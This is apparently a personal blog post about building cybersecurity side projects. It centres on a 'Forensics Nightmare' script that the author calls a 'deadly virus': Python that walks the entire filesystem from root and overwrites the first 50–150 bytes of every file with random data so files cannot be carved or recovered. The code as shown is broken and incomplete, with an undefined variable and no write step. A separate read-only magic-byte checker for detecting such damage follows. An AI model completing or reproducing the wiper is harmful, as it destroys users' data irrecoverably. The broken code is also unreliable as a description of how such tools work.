Cyber Security Projects
Origin
I was in an interview and they asked what I have done on the side, which hit me as a huge thing I have been overlooking. I don't have any cyber security projects but have a lot of programming projects. Sure, I have CTFs, but how much does that account for? I realize I need to add more to get more credibility.
Overview
I wanted a program that could be useful in cyber security. It just puts segments together into one huge program, kind of like TOBIAS but in cyber security.
Forensics Nightmare
Basically, in forensics I learned that carving comes from the magic bytes or headers of a file. I didn't want to append, and it seemed there was nothing you could do to write the beginning bytes of the file until I found mmap. It could rewrite the first bytes of a file. Mix that in with a traversal and you get a deadly virus that rewrites a computer. The bytes are random, so the only way to recover is to brute-force guess the correct file type, and even then you still have a loss, as I didn't just do the first few bytes but a good chunk.
import mmap
import random
import numpy as np
import os
import subprocess

def main():
    #subproccess.run('pip3 install mmap')
    path = "/"
    #we shall store all the file names in this list
    filelist = []
    print("starting up")
    for root, dirs, files in os.walk(path): # Finds all the files on the system
        for file in files:
            #append the file name to the list
            filelist.append(os.path.join(root,file))
    print("loading......")
    if True:
        for f in filelist: # Iterates through the files and rewrites the beginning bytes
            try:
                file_obj = open(f, mode='r+')
                mmap_obj = mmap.mmap(file_obj.fileno(),length=0,access=mmap.ACCESS_WRITE,offset=0)
                file_size = os.path.getsize(filepath)
                startint = 50
                endint = 150
                if file_size < 100:
                    endint = file_size
                    startint = file_size / 2
                rep_len = random.randint(startint, endint)
                randbytes = np.random.bytes(rep_len)
            except:
                pass

main()
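A read-only check for the kind of header damage described above, as an added example that is not part of the original project: it walks a directory and flags files whose leading bytes no longer match the signature expected for their extension. The signature table covers only a few well-known formats, and the function names and sample files are constructed for illustration.

```python
import os
import tempfile

# Leading-byte signatures (magic bytes) for a few common formats.
SIGNATURES = {
    ".png": [b"\x89PNG\r\n\x1a\n"],
    ".pdf": [b"%PDF-"],
    ".zip": [b"PK\x03\x04", b"PK\x05\x06"],
    ".gif": [b"GIF87a", b"GIF89a"],
    ".jpg": [b"\xff\xd8\xff"],
}

def header_ok(path):
    """True/False when the extension has a known signature, None otherwise."""
    ext = os.path.splitext(path)[1].lower()
    sigs = SIGNATURES.get(ext)
    if sigs is None:
        return None
    with open(path, "rb") as fh:  # opened read-only, nothing is modified
        head = fh.read(max(len(s) for s in sigs))
    return any(head.startswith(s) for s in sigs)

def find_damaged(root):
    """Walk root and list files whose header contradicts their extension."""
    damaged = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if header_ok(path) is False:
                    damaged.append(path)
            except OSError:
                continue  # unreadable file: skip it and keep scanning
    return sorted(damaged)

def demo():
    """Constructed sample tree: an intact PNG, a PDF with a clobbered header."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "ok.png"), "wb") as fh:
            fh.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
        with open(os.path.join(root, "bad.pdf"), "wb") as fh:
            fh.write(b"\x13\x37\xc0\xde\x99" + b" rest of document")
        with open(os.path.join(root, "notes.txt"), "wb") as fh:
            fh.write(b"no signature expected")
        return [os.path.basename(p) for p in find_damaged(root)]

if __name__ == "__main__":
    print(demo())
```

Run against a known-good baseline first: files that legitimately carry a mismatched extension will also be reported.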
TBD